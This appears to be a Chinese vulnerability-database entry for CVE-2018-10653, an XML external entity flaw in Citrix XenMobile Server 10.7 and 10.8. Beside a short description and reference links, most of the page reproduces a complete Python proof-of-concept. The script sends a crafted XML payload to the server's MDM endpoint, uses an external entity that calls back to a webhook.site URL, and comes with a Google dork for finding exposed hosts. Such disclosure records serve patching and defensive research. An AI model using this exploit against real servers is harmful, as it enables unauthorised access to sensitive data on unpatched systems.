Citrix XenMobile Server 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1125408 漏洞类型 代码问题
发布时间 2020-01-31 更新时间 2020-07-24
CVE编号 CVE-2018-10653 CNNVD-ID CNNVD-201805-765
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2020010230
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201805-765
|漏洞详情
Citrix XenMobile Server是美国思杰系统(Citrix Systems)公司的一套移动管理解决方案。该方案能够管理移动设备、制定移动策略和合规性规则、深入了解移动移动网络运行情况等。 Citrix XenMobile Server 10.8版本和10.7版本中存在代码问题漏洞,该漏洞源于程序没有正确处理XML外部实体。远程攻击者可借助特制文件利用该漏洞获取敏感信息。
|漏洞EXP
# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
<jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys
from pprint import pprint
import uuid

# Surf to https://webhook.site and copy/paste the URL below. Used for
XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

id = str(uuid.uuid1())

xml = '''<?xml version="1.0" encoding="UTF-8"
standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''

print(id)

response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
 headers=
{'User-Agent': 'MDM/1.0',
'Connection': 'close',
'Content-Type': 'application/x-apple-aspen-mdm'},
data=xml,stream=True
)
print(response.content)
print(response.text)
pprint(response)
|参考资料

来源:support.citrix.com
链接:https://support.citrix.com/article/CTX234879